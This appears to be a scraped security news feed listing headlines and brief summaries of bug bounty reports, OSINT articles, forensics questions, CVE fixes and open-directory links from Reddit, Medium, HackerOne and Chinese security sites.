    Hey folks, Continue reading on Medium »  ( 2 min )
    Improving the impact of a mouse-related XSS with styling and CSS-gadgets
    I will write more about how I make PoCs in the future. But with special care, I work out scenarios for vulnerabilities that need user… Continue reading on Medium »  ( 2 min )
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence… Continue reading on Medium »  ( 7 min )
    Bug Bounty: My First Five Figure Payout
    This is the post from my Telegram channel about Bug Bounty, where I share my experience and knowledge as well as just write about being… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-02-12 Review
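    Analysis of Vulnerability Fixes in Open-Source Packages and the Software Supply Chain by ourren; The Eighteen Levels of Hell of Attack-Defense Confrontation by ourren. For more of the latest articles, visit SecWiki  ( 2 min )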
  • Open

    OSINT Automation Tool — Spiderfoot
    Spiderfoot Continue reading on Medium »  ( 1 min )
    Valerie vs Valoree
    Yes, this is really happening.  No, I’m not running to cause ballot confusion. Continue reading on Medium »  ( 1 min )
    How To Find Timestamps For Verification
    Finding exact timestamps in web material is a must-have ability for OSINT and verification researchers, but where do you look? Continue reading on Medium »
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence… Continue reading on Medium »  ( 7 min )
  • Open

    The Top 13 Ethical Hacking Courses on Udemy (2022)
    submitted by /u/Jan_Prince [link] [comments]
  • Open

    Technical documents for JOINT POLAR SATELLITE SYSTEM
    A little over my head but if any climate geeks want to access raw data, here's the tools. Main index directory: https://www.jpss.noaa.gov/assets/ Community Satellite Processing Package (open source direct broadcast): http://cimss.ssec.wisc.edu/cspp/ Example: https://www.jpss.noaa.gov/assets/pdfs/technical_documents/472-00340_J2_HRD_to_DBS_RF_ICD_Rev_C.pdf API references: https://www.jpss.noaa.gov/sciencedocuments/sciencedocs/2015-06/474-00019-01_JPSS-API-Users-Guide-Vol-I_0123A.pdf https://www.jpss.noaa.gov/sciencedocuments/sciencedocs/2015-06/474-00019-02_JPSS-API-Users-Guide-Vol-II_0124-.pdf submitted by /u/inoculatemedia [link] [comments]
    Audio and art programs (mostly) for Atari 2600
    http://www.qotile.net/files/ submitted by /u/inoculatemedia [link] [comments]
  • Open

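    Exploring API Penetration Testing for Modern Applications with Separated Front End and Back End
    More and more domestic internet companies have adopted front-end/back-end separation to speed up development and testing iterations and to meet the need for a unified front end. With the new front-end frameworks, how to test APIs more efficiently becomes increasingly important.  ( 1 min )
    NodeJS Heap Overflow? The Cause Is the Default Memory Limit. Lift the Seal!
    Applications developed with NodeJS may run into a heap overflow if they need to process large amounts of data. The error message will contain "JavaScript heap out of memory".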
  • Open

    CISSP Domain 1 - Episode 5 - Security Roles and Responsibilities, Control Frameworks, Due care & Due Diligence, Policies, Standards, Procedures, Guidelines & Baseline and Threat Modeling by Get Set CISSP
    submitted by /u/Tradition_Wonderful [link] [comments]  ( 1 min )
  • Open

    How do I get my foot in the door with forensics?
    I have my masters in digital forensics but like a fool I never did anything with it. I’m a quick study and will only take me about a week or two to relearn everything. I have a security clearance and currently with in government contracting as a project manager but no company is biting. I want to finally make the switch but it’s hard when you don’t have in lab experience or the certs. Any advice on how to get restarted in this field? TIA! submitted by /u/kindreddino [link] [comments]  ( 6 min )
    Imaging Android and iOS devices
    Hello, can anyone teach me how to image these devices. Or if you can point me to some tutorials. I have been trying to learn but I keep failing. Thanks in advance. submitted by /u/Sudden_Ad9859 [link] [comments]  ( 1 min )
  • Open

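    Soon You Won't Be Able to Set document.domain in Chrome ⚠️
    Chrome will disable modifying document.domain to relax the same-origin policy. Google recently announced a change to how the Chrome browser handles document.domain. Since the three major browser vendors tend to adopt similar policies, Firefox and Safari will likely change in a similar way. In short, from Chrome 106+ onward, the setter for document.domain will reportedly be removed by default. document.domain: In fact, document.domain has some problems. Because document.domain ignores the port number part of the domain, if services on the same domain are served on different ports, they would ordinarily not be same-origin with each other, but document.
    ZAP's New Networking Stack
    Last Thursday night, simon shared something in the ZAP Developers Groups. It was about ZAP's networking layer, and as soon as I saw the title I knew what it was about. (It's something I had really been waiting for 🤩) The networking stack has changed in the Weekly version! Let's take an early look at what this work was meant to improve, how it has changed, and where it is heading :D Why? First, very little of the networking stack or layer is actually visible to users. It is the part that handles networking inside the application, and because ZAP is an old project, the networking base it was built on used the old Apache Commons HttpClient library.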
  • Open

    Apple fixes Mac battery drain, WebKit vulnerability in software updates
    Article URL: https://arstechnica.com/gadgets/2022/02/apple-patches-security-holes-and-bugs-with-ios-15-3-1-and-macos-12-2-1/ Comments URL: https://news.ycombinator.com/item?id=30308727 Points: 2 # Comments: 0  ( 3 min )

  • Open

    Simple tool to find client side prototype pollution vulnerability
    submitted by /u/boch33n [link] [comments]
    Pre-auth WAN remote root for Cisco RV340 VPN Gateway Router
    submitted by /u/ChoiceGrapefruit0 [link] [comments]
    Cisco ASDM: Manage at Your Own Risk
    submitted by /u/chicksdigthelongrun [link] [comments]
    WordPress < 5.8.3 - Object Injection Vulnerability
    submitted by /u/monoimpact [link] [comments]  ( 1 min )
    A simple tool to audit Linux system libraries to find public security vulnerabilities.
    submitted by /u/CoolerVoid [link] [comments]  ( 1 min )
    AD CS: from ManageCA to RCE - BlackArrow
    submitted by /u/Margaruga [link] [comments]
    Internet-Wide Study: State Of SPF, DKIM, And DMARC - RedHunt Labs
    submitted by /u/redhuntlabs [link] [comments]  ( 1 min )
  • Open

    Mellium 0.21.1 fixes CVE-2022-24968
    Article URL: https://mellium.im/cve/cve-2022-24968/ Comments URL: https://news.ycombinator.com/item?id=30308038 Points: 1 # Comments: 0  ( 1 min )
    Apple fixes actively exploited zero-day (CVE-2022-22620)
    Article URL: https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-apple-fixes-actively-exploited-zero-day/ Comments URL: https://news.ycombinator.com/item?id=30304109 Points: 1 # Comments: 0  ( 3 min )
  • Open

    How safe is this obscure software my friend bought on eBay?
    My friend is having technical difficulties with his iPad (he reset it and you can’t get through the welcome/setup without allowing remote access management to a certain company, which he doesn’t want to do) and he bought some software on eBay that promises to help bypass that error. His computer is old and won’t run the software when he tries to. My MacBook is brand new and so he asked me if I could download the eBay software onto my computer to try to fix the iPad. To me that doesn’t seem like something I want to download onto my new laptop. Maybe I shouldn’t have binged all of the darknet diaries podcast but idk doesn’t feel safe. Here’s what it looks like. Any thoughts? submitted by /u/aimhighswinglow [link] [comments]  ( 4 min )
    Is it safe to feed patterns to hashing functions in order to create passwords for websites?
    I had this idea on how to generate supposedly safe passwords for different websites/accounts that wouldn't require passwords to be memorized or stored. The idea is to 1 - Come up with a short default string that would never change (say, "bubly42") 2 - Append the name of the website to that string for each website you make an account. For example, when creating an account for airbnb it'd produce the string "bubly42airbnb" 3 - Run that string (bubly42airbnb) through a hash function 4 - Use the output of the hash function as the password for the website This would have the upside of not requiring memorization or storage of passwords, while still generating a unique password for each site. I can just generate the password on the fly. Obvious downside is that if someone figures your pattern out, they pretty much can figure out all of your passwords. Is there anything else that I'm missing? Is this considered safe? (Btw, sorry if I'm posting on the wrong place. If that's the case, can someone direct me to a good subreddit to post this in?) submitted by /u/djoncho [link] [comments]  ( 4 min )
    Possible malware in official Torguard windows VPN client ??
    Torguard's VPN client intermittently consumes 50% cpu, for long periods, unrelated to any network activity, which I find suspicious. Details below. I've raised this with TG's tech support who have repeatedly denied that any such behavior exists. I'm seeing this consistently on 4 windows machines (including one VM) where I have TG running. I'm not sure where to report this as there is no TG subreddit and the VPN subreddit doesn't allow mentioning specific services. Hopefully you folks can point me in the right direction or give advice. So, if the app is running and the VPN is connected, even if there are no other apps open, TG client will randomly begin consuming a constant 50% CPU. I can't correlate this with any other condition like network traffic or other app activity or any obvious thing TG is doing. If I minimize the TG client window, it stops. And then it starts again in a few minutes, and so I repeat this remedy, and it stops. If I don't do this it continues indefinitely. So, every computer this is running on experiences a significant heat/wattage increase and CPU performance degradation due to TG. I took screenshots of this behavior using task manager. I also watched it using winternals' process monitor, which gave much more detailed info than this. ---- But this forum doesn't allow pictures. submitted by /u/Dougolicious [link] [comments]  ( 2 min )
    How to get over the unrecognized app/publisher warning in Windows
    All, I am writing an executable to put on a website for download. Every time I go to download it, I get an "unrecognized app, unknown publisher warning". It's not tagged as malicious, but it's tagged as "unknown publisher" which makes it appear that way. Does anyone know how to add a publisher? Is that something a non-corporation can do? Or could I at least add a certificate or something to make Windows calm down? submitted by /u/iExtrapolate314 [link] [comments]  ( 1 min )
    How to get access on clean-mx.de
    Correct me if I am on the wrong subreddit, I have seen some people talk about this site in here, but how do you get access on clean-mx? I tried creating an account in there (registration form), but I haven't got a response back, unless I am being impatient. I also tried contacting the email, but it is dead as stated in the site. There are multiple sites to register accounts, xlogin.php, xregister.php, etc etc. I can see it's alive because when I search the site up, I see the dates from right now. Is this site restricted to companies only or not? Can you not register anymore? (couldn't post this in another subreddit, my post kept getting removed because they thought it was a tech-support question) submitted by /u/RainbowIsRainbow [link] [comments]  ( 1 min )
    What security monitoring tools can accomplish this scanning and detection?
    Hi Folks, As the title says, what tools can help to achieve these objectives Real time scan the network to detect presence of unauthorized hardware, software, and firmware components within the network. To scan and detect in real- time the addition of devices into network and notify the security administrator via email. submitted by /u/techno_it [link] [comments]  ( 3 min )
    Pen test dropbox running Win OS with Kali VM - with 4G callback
    Looking for some hardware advice for a pen test dropbox. I'd like the unit to be responsive with desktop-speed chipsets, x86/x64 based, and have an out-of-band 4G SIM callback for when client networks prevent outbound connectivity. With Windows as the primary OS, is there any way to auto connect the 4G/cellular modem with Windows, as there is with Linux (ie wvdial)? Are there any capable NUC type devices or mini PCs with inbuilt 4G capability. Want to avoid having USB modems sticking out the side, perhaps similar to rPi's cellular hat, but not rPi (or other SBCs) which would struggle with a Win with Kali VM setup. Happy to spend a bit on hardware, are there many notable boxes other than the Intel NUC, Zotac Zbox or MSI Cubi? Seen a few decent build docs that almost fit the bill, but not quite: https://infosecwriteups.com/part-2-build-the-pen-test-drop-box-69278526886a https://www.blackhillsinfosec.com/pentesting-dropbox-on-steroids/ https://www.blackhillsinfosec.com/how-to-build-your-own-penetration-testing-drop-box/ https://www.sprocketsecurity.com/blog/penetration-testing-dropbox-setup-part1 Thanks! submitted by /u/ama21n [link] [comments]  ( 1 min )
    Would a "technical support specialist" be a good start to eventually end up in cyber security?
    Hello. I'm graduating college soon and have an offer as a support specialist. The responsibilities are as follows: Provide 1st-tier technical support for production support issues Troubleshoot system errors by reviewing technical logs, system documentation, and application logic Monitor and triage errors generated by automated tasks in production Collaborate with Client Excellence team to ensure users’ technical support issues are resolved quickly On call rotation for urgent production issues during weekends and holidays I've been applying to IT jobs but have had little luck. Would a job like this be a good introduction into security? Or should I look for a more traditional IT job? submitted by /u/Hellothere6667 [link] [comments]  ( 1 min )
  • Open

    LNK Files, Again
    What, again?!?! I know, right?!? Not long ago, I read this fascinating article from Joe Helle that discussed malicious uses for Windows shortcuts, or LNK files, and also discussed a Python3 script called "lnkbomb". As a side note, check out what Joe had to share about persistence via WSL2! As anyone who's followed me for a minute knows, I love...L   O   V   E...me some LNK files. Shortcut files are something that we see all the time, have been around for a long time (much like ADSs), but folks in the DFIR field are so focused on the "shiny hot newness", that this file type is very often overlooked and not fully exploited. The technique Joe discusses is similar to modifying the iconfilename field of a shortcut file, so that even if the "bad guy" is evicted from an infrastructure, any action that launches the LNK file results in credentials being passed via HTTP or WebDAV, where they can be collected, cracked, and then used by the threat actor. LNK files have a lot of uses, and understanding the format and structure is helpful in a lot of different ways. One example is that automatic JumpLists follow the OLE/structured storage format, and all but the DestList stream consist of LNK file formatted streams. Another example is that the building blocks of LNK files, shell items, are also the core building blocks of several Registry-based artifacts, such as shellbags. Beyond that, however, threat actors have used LNK files as lures in social engineering and phishing attacks; this means that the threat actor has built the LNK files within their own infrastructure, within their own development environment. As such, sending these files as lures is "free money" to both DFIR and CTI analysts, if they're able to leverage those files and their component metadata. 
So...while I know Windows 11 is out, and everyone's excited about the shiny new hotness, let's not forget that there's a lot that has worked since Windows XP (or even prior to that) and still continues to be an issue today.  ( 4 min )
  • Open

    How to Choose a Security Plugin That’s Right for Your Website
    Finding the perfect security plugin for your website is important, but it’s also crucial you find the proper one that suits your needs. WordPress plugins are a dime a dozen, so we’ll be discussing how to narrow your options and what to look for in a reliable plugin so you can safely install it on your website. Some of the most frequent issues with poorly managed plugins include eating up memory in excess, 500 internal server errors, downtime, white pages, and slow response times. Continue reading How to Choose a Security Plugin That’s Right for Your Website at Sucuri Blog.
  • Open

    Honeypot OSINT
    In this post I will be going through the open source intelligence process I went through following an attack performed against my honeypot. Continue reading on Medium »  ( 8 min )
    Building a public OSINT lab target
    The Utah Valley University Cyber Security Program needed a realistic target that students could use to learn OSINT and offensive tools… Continue reading on Medium »  ( 1 min )
    [EN] TryHackMe 25 Days of Cyber Security: Day 14 Walkthrough
    [Day 14] OSINT Where’s Rudolph? Continue reading on Medium »  ( 3 min )
    Tallin To Search More Churches — OSINT Challenge 14
    On Dec 27, 2021, OSINT Dojo shared a OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken. Please… Continue reading on Medium »  ( 1 min )
  • Open

    Adding customers to victim’s store via Insecure Direct Object Reference
    Hello! I am back with my 2nd bug bounty write up. This time I’ll be showing you how I found an Insecure Direct Object Reference bug on an… Continue reading on Medium »  ( 1 min )
    QRCDR Path Traversal Vulnerability
    QRCDR is a popular PHP — JavaScript QR-Code Generator, which is widely used for creating customized QR-Code in easy steps. also, it’s used… Continue reading on Medium »  ( 2 min )
    Hacking ticketastic
    Hi guys! I’m back with another great blog, with this blog you can learn more about SQLi and Cross Site Request Forgery (CSRF). Continue reading on Medium »  ( 2 min )
    100 Days of Hacking — Day 7
    Objectives of day 7 : Continue reading on Medium »  ( 1 min )
    Basic Web technologies required for starting with the web Exploitation Part-2
    Hello Myself Manan Aggarwal is here to present the Blog about the Basic Web technologies required for starting with the web Exploitation… Continue reading on Medium »  ( 4 min )
    Introduction to Spring Boot Related Vulnerabilities
    Spring Boot related vulnerability learning materials, collection of utilization methods and skills, black box security assessment checklist Continue reading on Medium »  ( 12 min )
    iOS jailbreak dev wins $2M bounty for finding critical Optimism bug
    Continue reading on Medium »  ( 2 min )
    VulnLab SQL Injection— Dynamic Application Security Testing #3
    Assalamualaikum Wr.Wb Continue reading on Medium »  ( 6 min )
  • Open

    Amcache SHA-1 mismatch
    Hoping someone has seen this or has an idea what may be happening. I am performing a review and identified an installer file as an item of interest. I see the file in the host’s Amcache hive with a SHA-1 (“A”) hash. However, the recovered file has a different SHA-1 hash on disk (“B”). When running the executable on my test system and comparing it to that test machine’s Amcache, I see the same behavior. Amcache has hash “A” and the executable has hash “B.” Every other program I’ve sampled has hash matches; it seems like just this one is off. What gives? For specifics, I am using RegistryExplorer and Amcache Parser (both Zimmerman tools) for Amcache analysis. I am hashing with both X-Ways and Hasher (also Zimmerman). When reviewing Amcache Parser, I am matching the hash to the executable …  ( 3 min )
    Does anyone have Magnet Acquire download link without filling the form?
    I can't afford the axiom (or whatever it is called) so can anyone provide me the link? Thank you so much! submitted by /u/Hopelessssssssss [link] [comments]  ( 1 min )
    Announcing Opensource X-Ways HashExporter Extension
    This opensource extension allows you to dump all the hashes from an image using X-Ways command-line. https://github.com/PolitoInc/X-Ways-HashExporter-Extension submitted by /u/Alarming_Arm_7724 [link] [comments]  ( 1 min )
    What program should I specialize in if I cannot choose digital forensics?
    Computer Science and Engineering with specialisation in Blockchain Technology Computer Science and Engineering with specialisation in Information Technology Computer Science and Engineering with specialisation in Data Science. Or does it not matter as long as it is Csc ? submitted by /u/nodogsareevil [link] [comments]  ( 1 min )
    What transferable skills does forensics provide?
    I am currently a digital forensic analyst of both phones and computers for law enforcement. I want to transition into a new tech role, such as infosec or another form of cyber sec but looking at the job specs for 90% of these roles I do not meet the requirements. I’m considering self funding a cert such as CISSP or Security+ as this will most likely help. What sort of jobs can my current role land me in? submitted by /u/gofigured21 [link] [comments]  ( 3 min )
    CHFI Content Weightage
    Hello, Can we guess the content weightage of CHFI in the actual exam? I mean how can we know which modules will have more questions and other modules will have fewer questions in exam? I need to take the test and the book is very lengthy that can't be read as a whole so I want to get info about modules' weightage so I can learn them first (which will have more questions in the exam) and then the remaining modules (which have fewer questions). If not exactly any guess about it? submitted by /u/hardfire005 [link] [comments]  ( 1 min )
    Learning DFIR?
    Hi everyone. I am eJPT certified and been doing tryhackme for a year now. I want to move towards blue side, especially forensics and incident response. What i wanna ask is what is best resource/website to learn dfir/soc etc Is CHFI course content good? Are elearn security forensics and incident response courses and certs valuable? Or should i stick with tryhackme (it has less content regarding blue teaming) I have also heard of securityblueteam so is the investment there invaluable? Thanks submitted by /u/Nightkinnng [link] [comments]  ( 1 min )
  • Open

    CALISHOT 2022-02: Find ebooks among 348 Calibre sites this month
    submitted by /u/krazybug [link] [comments]  ( 1 min )
    archaeological dig photos from Iraq
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    [q] Index template/website script
    Hi guys, I hope this is the correct place to ask; I want to make a website where I can index certain posts and urls. (like a blog but easier) could you please guide me? tyvm submitted by /u/zuperfly [link] [comments]  ( 1 min )
    A way to clone an Open Directory?
    Is there a tool that can clone/upload all the files from an OD to my shared google drive? I know about rclone but since it's not easy to use, I don't want to waste time with it if it can't do the required task. + Is there a tool that can upload a shared google drive file to my shared drive? Again, I know about the "make a copy" option but that is not usable if the file is over the size of the free space your drive has. submitted by /u/CompetitiveMango12 [link] [comments]  ( 2 min )
  • Open

    Discoverability by phone number/email restriction bypass
    Twitter disclosed a bug submitted by zhirinovskiy: https://hackerone.com/reports/1439026 - Bounty: $5040
    Able to detect if a user is FetLife supporter although this user hides their support badge in fetlife.com/conversations/{id} JSON response
    FetLife disclosed a bug submitted by trieulieuf9: https://hackerone.com/reports/1423704 - Bounty: $100
    Information Exposure Through Directory Listing vulnerability
    Nextcloud disclosed a bug submitted by technorat: https://hackerone.com/reports/1476709
  • Open

    AD CS: from ManageCA to RCE - BlackArrow
    submitted by /u/gid0rah [link] [comments]
    🔥🔥 A new version 0.1.3 released for Kubesploit: a post-exploitation framework for Kubernetes🔥🔥
    submitted by /u/kubiscan [link] [comments]
    Retrieving Syscall ID with Hell's Gate, Halo's Gate, FreshyCalls and Syswhispers2
    submitted by /u/dmchell [link] [comments]
  • Open

    SecWiki News 2022-02-11 Review
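    [HTB] Love Writeup by 0x584a; PendingIntent Redirection: A Universal Privilege Escalation Method Targeting Android and Popular Apps by ourren; Security Risks of Automated Machine Learning by ourren; Deconstructing Open-Source IAST to Build a Powerful Gray-Box Security Tool by ourren. For more of the latest articles, visit SecWiki  ( 2 min )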
  • Open

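    FreeBuf Morning Report | Shanghai programmer sentenced to 10 months for deleting a code repository and fleeing; credit card skimmers planted on 500 e-commerce sites
    A 29-year-old programmer surnamed Lu, without company authorization, deleted all of the system code for the soon-to-launch JD Daojia platform on the day he left the company.  ( 1 min )
    Fake dnSpy - This Chicken Soup Has Been Poisoned!
    dnSpy is a popular tool for debugging, modifying, and decompiling .NET programs. Security researchers often use it when analyzing .NET programs or malware.  ( 1 min )
    Hackers attack European port oil facilities, sending oil prices soaring; Shanghai issues its first "Enterprise Data Compliance Guidelines"; Microsoft plans to acquire a cybersecurity company | Cybersecurity Weekly
    Eight global cybersecurity hot topics were collected from February 7 to February 11, 2022, involving Microsoft, Mandiant, Puma, Swissport, and others.  ( 1 min )
    French regulator says Google Analytics poses data privacy risks
    The French regulator holds that the service does not take sufficient measures to protect data privacy rights when transferring data, which could be exploited by US intelligence agencies.
    Kimsuky is using xRAT to steal information
    ASEC analysts recently found that the Kimsuky group is using the xRAT malware (an open-source RAT customized from Quasar RAT).  ( 1 min )
    Arid Viper APT group launches attacks targeting Palestine
    The Arid Viper group uses content originally published by Turkey's state-run news agency Anadolu and the Palestinian MAAN Development Center as lures to attack Palestinian institutions.  ( 1 min )
    FreeBuf Weekly | More than 500,000 people affected by Morley ransomware attack; hackers attack European port oil facilities
    Business services firm Morley Companies disclosed a user data breach in which a large amount of user data was stolen.  ( 1 min )
    SPD Bank Credit Card Center is hiring information security engineers
    Shanghai Pudong Development Bank Credit Card Center is hiring information security engineers.
    MIIT again solicits comments on the "Measures for Data Security Management in the Industry and Information Technology Field (Trial)"
    The Measures consist of 8 chapters and 41 articles, and stress that important data and core data should be stored within the country in accordance with the applicable laws and regulations, or undergo a data export security assessment in accordance with laws and regulations.  ( 1 min )
    A brief discussion of musl heap exploitation techniques (debugging part)
    Recent competitions have featured more and more musl challenges, so I have had to study musl heap exploitation to prepare for future competitions.  ( 1 min )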
  • Open

    AppSec best practices for security that sticks
    In the complex and dynamic world of application security, best practices are your best friends. This post shows how you can build an effective AppSec program based on tried and tested workflows and tools for vulnerability testing and remediation. READ MORE  ( 6 min )

  • Open

    How to crack RSA-512 on off-the-shelf hardware in 4 days
    submitted by /u/ScottContini [link] [comments]
    Five Vulnerabilities Explained in Moxa MXview for OT Networks
    submitted by /u/h4ck3dit [link] [comments]
    Safer entropy accumulation in Linux 5.18's RNG
    submitted by /u/zx2c4 [link] [comments]  ( 1 min )
    what is Walkme Extension used for? I have it installed and enforced by default without ability to disable it - in all Chrome browsers on the work laptop...
    submitted by /u/One-World-One-Love [link] [comments]  ( 1 min )
    🇬🇧 Gaining the upper hand(le) - Hunting for privilege escalations and UAC bypasses by looking for leaked handles in unprivileged processes by @APTortellini and @last0x00
    submitted by /u/last0x00 [link] [comments]  ( 1 min )
    Firejail oopsie
    submitted by /u/MonkeeSage [link] [comments]
  • Open

    Fuzzing for XSS via nested parsers condition
    Article URL: https://swarm.ptsecurity.com/fuzzing-for-xss-via-nested-parsers-condition/ Comments URL: https://news.ycombinator.com/item?id=30292426 Points: 1 # Comments: 0  ( 5 min )
  • Open

    CVE-2022-0435: Remote Stack Overflow in Linux Kernel TIPC Module Since 4.8
    Article URL: https://www.openwall.com/lists/oss-security/2022/02/10/1 Comments URL: https://news.ycombinator.com/item?id=30291958 Points: 2 # Comments: 0  ( 6 min )
  • Open

    MakerDAO Launches $10m Bug Bounty On Immunefi
    Immunefi has grown by leaps & bounds since we first launched in December 2020 and now protects over $100 billion (that’s Billion with a B)… Continue reading on Immunefi »  ( 2 min )
    Programming languages and Cybersecurity
    Codes are fundamental blocks of logic which drives businesses all around the world today. Continue reading on Medium »  ( 6 min )
    100 Days of Hacking - Day 6
    Objectives of day 6 : Continue reading on Medium »  ( 1 min )
    100 Days of Hacking — Day 5
    Objectives of day 5 : Continue reading on Medium »  ( 1 min )
    Launching Superfluid Bug Bounty Program with Immunefi
    Our mission to establish the Superfluid Protocol as a key component of the financial rails of the future requires more than technological… Continue reading on Superfluid Blog »  ( 3 min )
    Buy any Products For Free From Bewakoof.com || Bug-Bounty $$
    Hi, Here we will see how you can buy any product for free from Bewakoof.com Continue reading on Medium »  ( 2 min )
    Internet-Wide Study: State Of SPF, DKIM, And DMARC — RedHunt Labs
    At RedHunt Labs, (under Project Resonance), we frequently conduct internet-wide research in different shapes and formats to understand the… Continue reading on Medium »  ( 7 min )
    How I earned $2,500 from discovering vulnerabilities
    Peace be upon you, and God's mercy and blessings. Continue reading on Medium »  ( 1 min )
  • Open

    Are there only 2 types of people in this world? — An OSINT analysis
    Today as I was scrolling through my LinkedIn’s home feed I came across this image that had been liked by someone from my network. Continue reading on Medium »  ( 3 min )
    Cyberspace Vault Osint
    Task Continue reading on Medium »
  • Open

    [h1-2102] Information disclosure - ShopifyPlus add user displays existing Shopify ID fullname
    Shopify disclosed a bug submitted by francisbeaudoin: https://hackerone.com/reports/1083922 - Bounty: $1900
    Bypass For #997350 your-store.myshopify.com preview link is leak on third party website Via Online Store
    Shopify disclosed a bug submitted by danishalkatiri: https://hackerone.com/reports/1015283 - Bounty: $500
    Password reset token leak via "Host header" on third party website
    Shopify disclosed a bug submitted by danishalkatiri: https://hackerone.com/reports/1092831
    Orders full read for a staff with only `Customers` permissions.
    Shopify disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1392032 - Bounty: $800
    Critically Sensitive Spring Boot Endpoints Exposed
    Semrush disclosed a bug submitted by a_d_a_m: https://hackerone.com/reports/1022048 - Bounty: $5000
    Sending Arbitrary Requests through Jupyter Notebooks on gitlab.com and Self-Hosted GitLab Instances
    GitLab disclosed a bug submitted by iwis: https://hackerone.com/reports/970869 - Bounty: $1500
    Installing Gitlab runner with Docker-In-Docker allows root access
    GitLab disclosed a bug submitted by jafarakhondali: https://hackerone.com/reports/1417211 - Bounty: $100
    Node.js Certificate Verification Bypass via String Injection
    Node.js disclosed a bug submitted by bengl: https://hackerone.com/reports/1429694
  • Open

    RCE vs Code Injection
    Hi, what's the difference between RCE and Code Injection ? submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    What is the type of vulnerability called where you put the wrong file extension in the URL on a file that you shouldn't have access to?
    I accidentally discovered something like that during a very beginners CTF challenge. We were supposed to do an SQL injection to get a config file but I for some reason put config.php in the URL and got the file to the browser. I reported it to the people holding the CTF and they said they reported it to the maker of the server software. I believe the software was open source so it would be fun to find a note somewhere that they fixed it. That is why I wonder what this type of vulnerability is called. submitted by /u/HugoTRB [link] [comments]  ( 2 min )
    What’s your pentesting workbench?
    I am going to create a set of servers for pentest and I would like your suggestions/advice/comments. I would buy three servers, one for exploit dev/malware analysis, preferably a Debian (Kali or Ubuntu), and the other two for pentesting. submitted by /u/Sea_Finish6689 [link] [comments]  ( 3 min )
  • Open

    Email Forensics CTF Now Live
    Hello, folks! Our Email Forensics Capture The Flag Competition is now live! The event comprises weekly challenges for ten weeks. https://m.klr.co/kMhMA Good luck, and have fun! submitted by /u/MetaspikeHQ [link] [comments]  ( 1 min )
    Black screen and flashing cursor on boot when running SIFT Workstation in VirtualBox
    I'm not sure if this is the correct place to post, apologies if it isn't. I have downloaded the SIFT Workstation OVA file from Sans website and opened it in VirtualBox. I get a boot menu where I can either just start Ubuntu or run the memory test application. Choosing Ubuntu, I just get a black screen with a flashing underscore cursor in top left corner. It has been standing there for 10 minutes now and nothing happens. It never gets to the logon screen. I have seen others mention the issue when searching for it, but I haven't found any mentioned solutions. Any ideas? submitted by /u/kennethfinnerup [link] [comments]  ( 1 min )
    Question about $Ntuninstall files..
    So I was nosing around an old HDD that had XP installed , and I come across these folders in the WINDOWS directory. Inside them, there are files called “spuninst”. So I open them in notepad and there is a system.snapshot heading with a bunch of programs and such listed. My first question is- Is this every program that was installed at this particular moment in time on the computer? Is there way to see when past programs were installed and subsequently deleted if there are no files to look at creation dates? Thanks for any help submitted by /u/Pubh12 [link] [comments]  ( 1 min )
  • Open

    Social Engineering Basics: How to Win Friends and Infiltrate Businesses
    Technology changes and defenses get better, but some things stay the same—like human gullibility, which can be easily exploited through social engineering. What is social engineering? Social engineering, at its core, is taking advantage of human nature. Humans are innately trusting, often try to help, and want to avoid confrontation. A big facet of social... The post Social Engineering Basics: How to Win Friends and Infiltrate Businesses appeared first on TrustedSec.  ( 5 min )
  • Open

    Vulnerability Reward Program: 2021 Year in Review
    Article URL: https://security.googleblog.com/2022/02/vulnerability-reward-program-2021-year.html Comments URL: https://news.ycombinator.com/item?id=30289291 Points: 1 # Comments: 0  ( 12 min )
    Responding to and Learning from the Log4Shell Vulnerability
    Article URL: https://www.hsgac.senate.gov/hearings/responding-to-and-learning-from-the-log4shell-vulnerability Comments URL: https://news.ycombinator.com/item?id=30284252 Points: 1 # Comments: 0  ( 1 min )
  • Open

    SecWiki News 2022-02-10 Review
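    Top 10 web hacking techniques of 2021 by ourren; A Tale of DOM-based XSS! by ourren; Detecting Beacon Communication with RITA by ourren; CVE-2021-33742: Analysis of the Internet Explorer MSHTML Heap Out-of-Bounds Write Vulnerability by ourren; The Defensive Dilemma Enterprises Face Against APT-Style Attacks by ourren; CobaltStrike Check-In over Blockchain Networks: Methods and Detection by ourren. For more of the latest articles, visit SecWiki  ( 2 min )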
  • Open

    Lots of porn photos (NSFW)
    submitted by /u/Boobalizer [link] [comments]
    [NSFW} nastyflixxx.net
    http://www.nastyflixxx.net/clips/?C=S;O=A submitted by /u/mrcave81 [link] [comments]
    Some NOAA Hurricane Files
    https://www.nhc.noaa.gov/video/ Nothing really that interesting submitted by /u/420danger_noodle420 [link] [comments]
    FTP of a Russian ISP (Ufanet)
    You can find some good stuff in it I thinks ? http://ftp.ufanet.ru/ Url: http://ftp.ufanet.ru/ Urls file Extension (Top 5) Files Size .iso 363 384,42 GiB .xz 283 105,96 GiB .img 136 52,78 GiB .tar 16 647 29,78 GiB .bz2 112 29,21 GiB Dirs: 10 532 Ext: 188 Total: 24 123 Total: 664,74 GiB Date (UTC): 2022-02-10 01:01:31 Time: 00:03:28 Speed: 2,01 MB/s (16,1 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    Some site's wp-content/uploads pages
    https://www.the8bitguy.com/wp-content/uploads/ https://tomorrowcorporation.com/blog/wp-content/uploads/ submitted by /u/ilikemacsalot [link] [comments]
    Informatic related Stuff (In French)
